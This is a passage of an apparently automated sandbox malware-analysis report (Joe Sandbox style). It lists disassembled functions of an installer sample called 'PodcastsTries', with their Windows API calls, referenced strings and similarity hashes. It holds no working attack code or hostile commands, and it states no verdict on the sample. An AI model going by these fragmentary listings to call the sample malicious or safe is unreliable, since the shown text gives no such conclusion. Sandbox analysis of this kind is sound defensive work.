                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(0006EA00,00000064,00133664), ref: 00403295
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: Version
                                                                                                                                                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          Memory Dump Source
